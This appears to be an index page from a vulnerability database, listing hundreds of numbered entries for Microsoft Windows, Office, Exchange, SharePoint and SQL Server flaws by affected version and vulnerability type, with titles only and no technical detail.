[122833] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI+ memory corruption [119469] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel privilege escalation [116015] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 memory corruption [114563] Microsoft Office 2007 SP3/2010 SP2/2013/2013 RT SP1 memory corruption [114528] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI privilege escalation [113257] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113256] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113255] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113247] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113246] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113245] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 EOT Font Engine information disclosure [113244] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113235] Microsoft Outlook 2007 SP3/2010 SP2/2013 SP1/2016 privilege escalation [113234] Microsoft Office 2007 SP2/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [113216] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [112285] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112284] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112283] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [112282] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111578] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111577] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111576] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111575] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111574] Microsoft Word 2003/2007/2010/2013/2016 Equation Editor memory corruption [111573] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111572] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111570] Microsoft Office 2007/2010/2013/2016 Equation Editor memory corruption [111568] Microsoft Excel 2007/2010/2013/2016 memory corruption [111566] Microsoft Word 2007/2010/2013/2016 memory corruption [111565] Microsoft Word 2007/2010/2013 Email Message privilege escalation [111563] Microsoft Outlook 2007/2010/2013/2016 Email Message privilege escalation [111347] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Color Management Icm32.dll information disclosure [109388] Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 memory corruption [109386] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [109385] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Security Feature Macro 7PK Security Features [109381] Microsoft Office/Word 2007 SP3/2010 SP2 memory corruption [107703] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106530] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106528] Microsoft PowerPoint 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106497] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Uniscribe memory corruption [106476] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [106475] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [105051] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Font Library Data Processing Error [102513] Microsoft Windows Server 2003 SP2/XP SP3 OLE olecnv32.dll privilege escalation [102512] Microsoft Windows Server 2003 SP2/XP SP3 rpc privilege escalation [102511] Microsoft Windows Server 2003 SP2/XP SP3 RDP EsteemAudit privilege escalation [102447] Microsoft PowerPoint/SharePoint Server 2007 SP3 memory corruption [102444] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Data Processing Error [102442] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 7PK Security Features [102441] Microsoft Outlook 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [102401] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI USP10!NextCharInLiga information disclosure [101491] Microsoft Windows up to XP SP3/Server 2003 SP2 Remote Desktop Protocol gpkcsp.dll memory corruption [101017] Microsoft Office 2007 SP3/2010 SP2/2016 Data Processing Error [101012] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1/2016 memory corruption [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [100854] Microsoft Windows Server 2003 SP2 RRAS ERRATICGOPHER memory corruption [99904] Microsoft Windows Server 2003 SP2/XP SP3 SmartCard Authentication EsteemAudit privilege escalation [99684] Microsoft Excel 2007 SP3/2010 SP2 Memory information disclosure [99654] Microsoft Outlook 2007 SP3/2010 SP2/2011/2013 SP1/2016 Email Message privilege escalation [99653] Microsoft Outlook 2007 SP3/2010 SP2/2011/2013 SP1/2016 Email Message memory corruption [99533] Microsoft Office 2007/2010/2013/2016 RTF Document Necurs Dridex privilege escalation [98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption [98092] Microsoft SharePoint Server 2007 SP3 memory corruption [98088] Microsoft SharePoint Server 2007 SP3 memory corruption [98087] Microsoft Office 2007 SP3/2010 SP2 information disclosure [98086] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [98085] Microsoft Excel 2007 SP3 memory corruption [98084] Microsoft Word 2007 SP3/2010 SP2/2011 memory corruption [98083] Microsoft Word 2007 SP3/2010 SP2/2011 memory corruption [98078] Microsoft Word/Excel 2007 SP3 memory corruption [98072] Microsoft Office 2007 SP3/2010 SP2/Word Viewer Graphics Component memory corruption [98071] Microsoft Office 2007 SP3/2010 SP2/Word Viewer GDI+ information disclosure [98070] Microsoft Office 2007 SP3/2010 SP2/Word Viewer GDI+ information disclosure [94450] Microsoft Office 2007 SP3/2010 SP2/2011 memory corruption [94449] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1 information disclosure [94448] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1 information disclosure [94445] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 information disclosure [94441] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94440] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [94439] Microsoft Office 2007 SP3/2011 information disclosure [94438] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [93542] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 memory corruption [93541] Microsoft Office 2007 SP3 privilege escalation [93539] Microsoft Office 2007/2010 SP2/2011 memory corruption [93538] Microsoft Office 2007/2010 SP2/2011/2013 SP1 memory corruption [93537] Microsoft Office 2007/2010 SP2/2011 information disclosure [93396] Microsoft Office 2007/2010/2011 memory corruption [93395] Microsoft Office 2007/2010/2011 memory corruption [93394] Microsoft Office 2007/2010 memory corruption [92596] Microsoft Windows 7 SP1/Server 2008 R2/Server 2008 SP2/Vista SP2 Internet Messaging API File information disclosure [91554] Microsoft Exchange 2007/2010/2013/2016 Email information disclosure [91553] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91552] Microsoft Office 2007/2010/2013/2013 RT/2016 privilege escalation [91551] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91549] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91548] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91546] Microsoft Office 2007/2010/2013/2013 RT memory corruption [91545] Microsoft Office 2007/2010 memory corruption [91544] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91542] Microsoft Office 2007/2010/2013/2013 RT/2016 information disclosure [90706] Microsoft Office 2007/2010/2013/2013 RT Graphics memory corruption [90705] Microsoft Office 2007/2010/2011 memory corruption [90703] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [89039] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [89034] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [88885] Microsoft Office 2000 SP1 Service Pack 2 privilege escalation [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88765] Microsoft Windows 2000/2000 SP1/2000 SP2 Service Pack 3 privilege escalation [88655] Microsoft Windows 2000 DNS Server privilege escalation [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [88583] Microsoft IIS 2.0/2.5 URLScan information disclosure [88236] Microsoft Windows NT 4.0/2000/Server 2003/XP SNMP WINS privilege escalation [88157] Microsoft Windows 2000/NT Password Policy weak authentication [88155] Microsoft Windows 2000/NT/XP LAN Manager weak encryption [88154] Microsoft Windows 2000/NT Username information disclosure [88153] Microsoft Windows 2000/NT information disclosure [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [87955] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87954] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87953] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87939] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 OLE DLL privilege escalation [87938] Microsoft Office 2007 SP3/2010 SP2/2011 information disclosure [87937] Microsoft Office 2007 SP3/2010 SP2/2011 memory corruption [87935] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87934] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87933] Microsoft Windows Server 2008 R2 SP1/Server 2008 SP2/Vista SP2 VBScript/JScript privilege escalation [87147] Microsoft Office 2007/2010 memory corruption [87145] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [87144] Microsoft Windows Server 2008/Vista SP2 JScript/VBScript memory corruption [84364] Microsoft PowerPoint 2000/2002/2003 mso.dll memory corruption [82228] Microsoft Excel 2007 SP3/2010 SP2 Office Document memory corruption [82225] Microsoft Word 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [82224] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [81273] Microsoft Office 2007/2010/2013/2016 privilege escalation [81272] Microsoft Office 2007/2010/2013 memory corruption [81265] Microsoft Windows Server 2008/Vista SP2 Library Loader privilege escalation [80872] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80871] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80869] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [79506] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Library Loader privilege escalation [79505] Microsoft Office 2007 memory corruption [79504] Microsoft Office 2007/2010/2013/2016 privilege escalation [79503] Microsoft Office 2007/2010/2013 memory corruption [79502] Microsoft Office 2007/2010/2011 memory corruption [79501] Microsoft Office 2007/2010 memory corruption [79499] Microsoft Windows 7/Server 2008 R2 Uniscribe Numeric Error [79493] Microsoft Windows Server 2008/Vista Graphics memory corruption [79190] Microsoft Word 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [79189] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [79187] Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Sandbox privilege escalation [79167] Microsoft Windows 7/Server 2008/Server 2008 R2/Vista Journal memory corruption [78371] Microsoft SharePoint Server 2007 SP3/2010 SP2 InfoPath Forms Services information disclosure [77646] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 EPS Image privilege escalation [77629] Microsoft Excel 2007 SP3/2010 SP2/2011/2016 Office Document memory corruption [77627] Microsoft Excel 2007 SP3/2010 SP2 Office Document memory corruption [77626] Microsoft Excel 2007 SP3/2010 SP2/2011/2016 Office Document memory corruption [77617] Microsoft Office 2007 SP3/2010 SP2 OpenType Font memory corruption [77252] Microsoft Office 2007 SP3/2010 SP2 Office Graphics Library Font privilege escalation [77038] Microsoft Windows Server 2008 SP2 UDDI Services cross site scripting [76497] Microsoft PowerPoint 2007 SP3/2010 SP2/2013 SP1 Office Document memory corruption [76491] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [76467] Microsoft Word 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76466] Microsoft Word 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76464] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [76463] Microsoft Excel 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76449] Microsoft Windows 8/8.1/Server 2008/Server 2012/Server 2012 R2 Hyper-V 7PK Security Features [76440] Microsoft SQL Server 2008/2008 R2/2012/2014 Virtual Function privilege escalation [76439] Microsoft SQL Server 2008/2008 R2/2012/2014 privilege escalation [76438] Microsoft SQL Server 2008/2008 R2/2012/2014 Pointer Casting privilege escalation [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [75338] Microsoft SharePoint 2007/2010/2013 Content privilege escalation [75337] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [75336] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [74845] Microsoft Office 2007/2010/2013 Document memory corruption [74844] Microsoft Office 2007/2010 Document memory corruption [74837] Microsoft Office 2007/2010/2011/2013 RTF Document denial of service [73979] Microsoft Exchange Server 2003 CU7/2003 SP1 Meeting privilege escalation [73978] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73977] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73976] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73975] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73964] Microsoft SharePoint 2007/2010/2013 cross site scripting [71337] Microsoft Office 2000/2004/XP privilege escalation [69158] Microsoft Office 2007/2010/2013 memory corruption [69157] Microsoft Office 2007/2010/2013 OneTableDocumentStream denial of service [62914] Microsoft Office 2003 SP3/2007 SP3/2008/2010 SP1/2011 Spreadsheet denial of service [60205] Microsoft .NET Framework 2.0 SP2/3.5.1 privilege escalation [60065] Microsoft Windows 2000 mod_sql information disclosure [58492] Microsoft SharePoint Server 2007 Spreadsheet memory corruption [58491] Microsoft Office 2004/2007/2008/2010/2011 Spreadsheet privilege escalation [58490] Microsoft Office Compatibility Pack 2007 Spreadsheet memory corruption [58489] Microsoft Office 2004/2007/2008/2010/2011 Spreadsheet memory corruption [58488] Microsoft Office 2007/2010 privilege escalation [57691] Microsoft SQL Server 2008 Web Service information disclosure [57690] Microsoft Excel 2002/2003 Spreadsheet memory corruption [57689] Microsoft Excel 2002 Spreadsheet memory corruption [57688] Microsoft Excel 2002 Spreadsheet memory corruption [57687] Microsoft Excel 2002/2003/2007 Spreadsheet memory corruption [57686] Microsoft Excel 2002 Spreadsheet memory corruption [57685] Microsoft Excel 2002/2003/2007 Array Access memory corruption [57684] Microsoft Excel 2002/2003/2007/2010 Spreadsheet memory corruption [57420] Microsoft PowerPoint 2002/2003 memory corruption [57079] Microsoft PowerPoint 2002/2003/2007/2010 privilege escalation [57078] Microsoft Office 2003/2007/Xp docx unknown vulnerability [57077] Microsoft Excel 2002 memory corruption [57076] Microsoft Excel 2002/2003 memory corruption [57075] Microsoft Excel 2002/2003 memory corruption [57074] Microsoft Excel 2002 memory corruption [57073] Microsoft Excel 2002/2003/2007/2010 Numeric Error [56475] Microsoft Office 2004/2008 privilege escalation [56176] Microsoft Windows 7/Server 2003/XP fxscover.exe CDrawPoly::Serialize memory corruption [55765] Microsoft Office 2003/Xp Numeric Error [55764] Microsoft Office 2003/Xp memory corruption [55420] Microsoft Office 2007/2010 memory corruption [55419] Microsoft Office 2004/2008/2011/Xp memory corruption [55412] Microsoft PowerPoint Viewer 2007 Numeric Error [55411] Microsoft PowerPoint 2002/2003 memory corruption [54995] Microsoft Office 2004/2008 privilege escalation [54994] Microsoft Office 2004/2008 privilege escalation [54993] Microsoft Office Compatibility Pack 2007 privilege escalation [54992] Microsoft Excel 2002 privilege escalation [54991] Microsoft Office 2004 Future privilege escalation [54990] Microsoft Office 2004 privilege escalation [54989] Microsoft Office 2004/2008 privilege escalation [54988] Microsoft Excel 2002 privilege escalation [54987] Microsoft Excel 2002 privilege escalation [54986] Microsoft Excel 2002/2003 privilege escalation [54985] Microsoft Office Compatibility Pack 2003/2004/2007/2008 privilege escalation [54984] Microsoft Office 2004/2008 privilege escalation [54983] Microsoft Excel 2002 Numeric Error [54980] Microsoft Word 2002/2003 privilege escalation [54979] Microsoft Word 2002 privilege escalation [54978] Microsoft Word 2002 privilege escalation [54977] Microsoft Word 2002 privilege escalation [54976] Microsoft Word 2002 denial of service [54975] Microsoft Word 2002 privilege escalation [54974] Microsoft Word 2002 privilege escalation [54973] Microsoft Word 2002 privilege escalation [54972] Microsoft Word 2002 privilege escalation [54971] Microsoft Word 2002 privilege escalation [54774] Microsoft Word 2003 word_crash_11.8326.8324_poc.doc denial of service [54757] Microsoft SharePoint Server 2007 HTML Sanitization SafeHTML cross site scripting [54617] Microsoft Outlook Web Access up to 2007 cross site request forgery [54550] Microsoft PowerPoint 2007 rpawinet.dll privilege escalation [54322] Microsoft Word 2002/2003 privilege escalation [54321] Microsoft Office Compatibility Pack 2007 memory corruption [54320] Microsoft Office Compatibility Pack 2007 privilege escalation [54319] Microsoft Office Compatibility Pack 2007 privilege escalation [54318] Microsoft .NET Framework 2.0 SP1/2.0 SP2/3.5/3.5 SP1/3.5.1 Interfaces privilege escalation [54083] Microsoft Access 2003 ActiveX Control ACCWIZ.dll privilege escalation [53591] Microsoft Windows Server 2003 GetServerName cross site scripting [53505] Microsoft Excel 2002/2007 privilege escalation [53504] Microsoft Excel 2002 privilege escalation [53503] Microsoft Excel 2002 privilege escalation [53502] Microsoft Excel 2002 privilege escalation [53501] Microsoft Excel 2002 privilege escalation [53500] Microsoft Excel 2002 privilege escalation [53499] Microsoft Excel 2002 privilege escalation [53498] Microsoft Excel 2002 privilege escalation [53497] Microsoft Excel 2002 privilege escalation [53496] Microsoft Excel 2002 privilege escalation [53495] Microsoft Excel 2002/2003/2007 privilege escalation [53494] Microsoft Excel 2002 privilege escalation [53493] Microsoft Excel 2002/2003/2007 privilege escalation [53385] Microsoft Exchange Server 2007 Outlook Web Access cross site scripting [53164] Microsoft Office 2003/2007/Xp ActiveX Control VBE6.DLL privilege escalation [52148] Microsoft Office 2004/2007/2008 privilege escalation [52147] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52146] Microsoft Office 2004/2007/2008 Spreadsheet memory corruption [52145] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52144] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52143] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52036] Microsoft Windows 2000 MsgBox memory corruption [51995] Microsoft SharePoint Server up to 2006 cross site scripting [51810] Microsoft Office 2004/Xp MSO.DLL memory corruption [51802] Microsoft PowerPoint 2003 memory corruption [51801] Microsoft PowerPoint 2003 memory corruption [51800] Microsoft PowerPoint 2002/2003 privilege escalation [51799] Microsoft PowerPoint 2002/2003 privilege escalation [51798] Microsoft PowerPoint 2002/2003 memory corruption [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [51133] Microsoft Windows 2000 SP4/Server 2003 SP2/SP3/XP SP2 privilege escalation [51074] Microsoft Office 2002/2003 Numeric Error [50794] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50793] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50792] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50791] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50790] Microsoft Office 2004/2008 Spreadsheet memory corruption [50789] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50788] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50787] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50786] Microsoft Windows 2000 llssrv.exe memory corruption [50660] Microsoft SharePoint Server 2007 privilege escalation [50443] Microsoft PowerPoint 2007 Numeric Error [50432] Microsoft .NET Framework 2.0/2.0 SP1/2.0 SP2/3.5/3.5 SP1 privilege escalation [49866] Microsoft Windows Server 2003 privilege escalation [49745] Microsoft Windows Server 2003 denial of service [49395] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49394] Microsoft Windows Server 2003 privilege escalation [49390] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49389] Microsoft Office 2000/2003/XP Office Web Components denial of service [49198] Microsoft Visual Studio 2005 information disclosure [49046] Microsoft Windows Server 2003 quartz.dll privilege escalation [49045] Microsoft Windows Server 2003 quartz.dll privilege escalation [49044] Microsoft ISA Server 2006 privilege escalation [48894] Microsoft Windows Server 2003 msvidctl.dll privilege escalation [48572] Microsoft PowerPoint 2002 FL21WIN.DLL privilege escalation [48554] Microsoft Excel 2000/2003/2007 privilege escalation [48517] Microsoft Windows 2000 denial of service [48516] Microsoft Windows Server 2008 privilege escalation [48515] Microsoft Office Word Viewer 2003 memory corruption [48514] Microsoft Office Word Viewer 2003 memory corruption [48512] Microsoft Windows Server 2008 privilege escalation [48157] Microsoft PowerPoint 2002 Sound memory corruption [48156] Microsoft PowerPoint 2000 memory corruption [48155] Microsoft PowerPoint 2002 Notes Container memory corruption [48154] Microsoft PowerPoint 2002 Sound PP7X32.DLL memory corruption [48153] Microsoft PowerPoint 2002 Sound privilege escalation [48152] Microsoft PowerPoint 2002 PP4X32.DLL memory corruption [48151] Microsoft PowerPoint 2002 memory corruption [48150] Microsoft PowerPoint 2002 Sound privilege escalation [48149] Microsoft PowerPoint 2002 privilege escalation [48148] Microsoft PowerPoint 2002 Sound privilege escalation [48147] Microsoft PowerPoint 2002 Sound privilege escalation [48146] Microsoft PowerPoint 2002 Numeric Error [47719] Microsoft Windows 2000 memory corruption [47718] Microsoft Excel 2000/2002/2003/2007 Spreadsheet denial of service [47716] Microsoft Office Converter Pack 2003 WPFT632.CNV privilege escalation [47715] Microsoft Windows 2000 Wordpad memory corruption [47091] Microsoft Windows Server 2008 privilege escalation [47090] Microsoft Windows Server 2008 privilege escalation [46620] Microsoft Windows Live Messenger 2009 msnmsgr.exe privilege escalation [46455] Microsoft Exchange Server 2007 privilege escalation [46454] Microsoft Exchange Server 2007 denial of service [46327] Microsoft Word 2007 information disclosure [45381] Microsoft Windows Server 2008/Vista SP1 Explorer denial of service [45380] Microsoft Windows Server 2008/Vista SP1 Search denial of service [45379] Microsoft Office SharePoint Server 2007 weak authentication [45197] Microsoft Windows 2000 nskey.dll memory corruption [45063] Microsoft Windows Server 2003 Active Directory information disclosure [45040] Microsoft .NET Framework 2.0.50727 Code Access Security weak encryption [44855] DjVu Activex Control For Microsoft Office 2000 3.0 ActiveX Control DjVu_ActiveX_MSOffice.dll memory corruption [44665] Microsoft Peachtree Accounting 2004 ActiveX Control PAWWeb11.ocx unknown vulnerability [44589] Microsoft Exchange Server 2003 Outlook Web Access directory traversal [44533] Microsoft Windows 2000 mqsvc.exe privilege escalation [44047] Microsoft SQL Server 2000 ActiveX Control SQLVDIRLib.SQLVDirControl memory corruption [43957] Microsoft Office 2003/2007/Xp gdiplus.dll Numeric Error [43956] Microsoft Office 2003/2007/Xp gdiplus.dll memory corruption [43955] Microsoft Office 2003/2007/Xp gdiplus.dll denial of service [43952] Microsoft Office 2003/2007/Xp URI privilege escalation [43676] Microsoft Windows 2000/Server 2003/Vista/XP privilege escalation [43675] Microsoft Windows 2000/Server 2003/Vista/XP of privilege escalation [43662] Microsoft PowerPoint Viewer 2000 SP3/2002 SP3/2003 SP2/2007 SP1 denial of service [43661] Microsoft PowerPoint Viewer 2003 denial of service [43660] Microsoft PowerPoint Viewer 2003 denial of service [43657] Microsoft Office 2000/2003/Xp denial of service [43654] Microsoft SharePoint Server 2007 denial of service [43653] Microsoft Office 2000/2002/2004/2008 privilege escalation [43652] Microsoft Office 2000/2002/2003/2004/2008 privilege escalation [43103] Microsoft Exchange Srv 2007 Sp1 Outlook Web Access cross site scripting [43102] Microsoft Windows 2000 SP4/Server 2003 SP2/Server 2008 DNS unknown vulnerability [43087] Microsoft Office Snapshot Viewer ActiveX up to Office 2003 Snapshot Viewer ActiveX Control snapview.ocx privilege escalation [42816] Microsoft Word 2000/2003 denial of service [42732] Microsoft Windows Server 2003/Vista/XP privilege escalation [42731] Microsoft Windows Server 2003 privilege escalation [42065] Microsoft SharePoint Server 2.0 Rich Text Editor cross site scripting [41881] Microsoft Office 2003/2007/2007 Sp1/Xp denial of service [41880] Microsoft Project 2000/2002/2003 denial of service [41879] Microsoft Windows 2000/Server 2003/Vista memory corruption [41878] Microsoft Windows 2000/Server 2003/Vista weak authentication [41877] Microsoft Windows Server 2003 vbscript.dll privilege escalation [41455] Microsoft Office 2000/2003/2004/Xp privilege escalation [41454] Microsoft Excel 2000/2002/2003/2007 memory corruption [41453] Microsoft Excel 2000/2002/2003 privilege escalation [41452] Microsoft Excel 2000/2002/2003/2007 privilege escalation [41451] Microsoft Excel 2000/2002/2003 privilege escalation [41450] Microsoft Excel 2000 privilege escalation [41449] Microsoft Excel 2000/2002/2003 privilege escalation [41448] Microsoft Office 2000/Xp Office Web Components privilege escalation [41003] Microsoft Office 2000/2003/2004/Xp denial of service [41002] Microsoft Office 2000/2003/Xp denial of service [40987] Microsoft Windows 2000 privilege escalation [40020] Microsoft Office 2007 ZIP Container privilege escalation [39769] Microsoft Windows 2000 cryptgenrandom information disclosure [39749] Microsoft Windows 2000 msjet40.dll memory corruption [39655] Microsoft Windows Server 2003 Configuration [39324] Microsoft Windows Mobile 2005 SMS privilege escalation [38999] Microsoft Windows Server 2003 explorer.exe denial of service [38899] Microsoft ISA Server 2004 information disclosure [38728] Microsoft SQL Server 2005 Enterprise Manager sqldmo.dll memory corruption [38326] Microsoft Windows 2000 attemptwrite Numeric Error [37739] Microsoft Excel 2000/2002/2003/2004/2007 memory corruption [37738] Microsoft Office 2002/2003 memory corruption [37566] Microsoft Excel 2003 unknown vulnerability [37526] Microsoft Windows 2000/Server 2003 denial of service [37251] Microsoft Windows 2000 memory corruption [37093] Microsoft Windows Server 2003 Error Message unknown vulnerability [37010] Microsoft Office 2000 ActiveX Control ouactrl.ocx memory corruption [36628] Microsoft Word 2000/2002/2003/2004 winword.exe privilege escalation [36621] Microsoft Exchange Server 2000 Numeric Error [36620] Microsoft Exchange Server 2000 Outlook Web Access cross site scripting [36619] Microsoft Exchange Server 2000/2003/2007 MIME memory corruption [36618] Microsoft Exchange Server 2000 denial of service [36617] Microsoft Excel 2000/2002/2003/2004 memory corruption [36515] Microsoft Windows 2000/Server 2003/XP memory corruption [36052] Microsoft Windows 2000 memory corruption [36051] Microsoft Word 2007 file798-1.doc memory corruption [36050] Microsoft Word 2007 file789-1.doc memory corruption [36041] Microsoft .NET Framework 2.0.50727.42 cross site scripting [36002] Microsoft Windows 2000/XP denial of service [35846] Microsoft Windows 2000/Server 2003 Default Configuration [35373] Microsoft Excel 2003 denial of service [35372] Microsoft Office 2003 denial of service [35206] Microsoft Windows Server 2003/XP denial of service [35161] Microsoft ISA Server 2004 unknown vulnerability [35001] Microsoft Office 2000/2003/2004/Xp privilege escalation [35000] Microsoft Word 2000/2002/2003 privilege escalation [34994] Microsoft Windows 2000 OLE Dialog memory corruption [34993] Microsoft Office 2000/2003/Xp memory corruption [34322] Microsoft Office 2000/2003/Xp memory corruption [34321] Microsoft Office 2000/2003/2004/Xp Spreadsheet memory corruption [34320] Microsoft Office 2000/2003/2004/Xp memory corruption [34319] Microsoft Office 2000/2003/2004/Xp memory corruption [34318] Microsoft Office 2000/2003/2004/Xp memory corruption [34126] Microsoft Office 2003 memory corruption [34122] Microsoft Office Web Components 2000 privilege escalation [33851] Microsoft Word 2000/2002/2003 12122006-djtest.doc memory corruption [33766] Microsoft Word 2000/2002/2003 memory corruption [33067] Microsoft Visual Studio .net 2005 ActiveX Control wmiscriptutils.dll memory corruption [32694] Microsoft Windows 2000 privilege escalation [32693] Microsoft Word 2004 memory corruption [32690] Microsoft Office 2000/2003/2004/Xp privilege escalation [32689] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [32688] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [32687] Microsoft Word 2000/2002 memory corruption [32686] Microsoft Office 2000/2001/2003/2004 Numeric Error [32685] Microsoft Office 2000/2001/2003/2004 memory corruption [32676] Microsoft Office 2000/2001/2003/2004 privilege escalation [32675] Microsoft Office 2000/2003/2004/Xp privilege escalation [31692] Microsoft PowerPoint 2000/2001/2002/2003 memory corruption [31358] Microsoft PowerPoint 2003 powerpnt.exe denial of service [31354] Microsoft PowerPoint 2003 memory corruption [31351] Microsoft ISA Server 2004 Filters unknown vulnerability [31318] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation 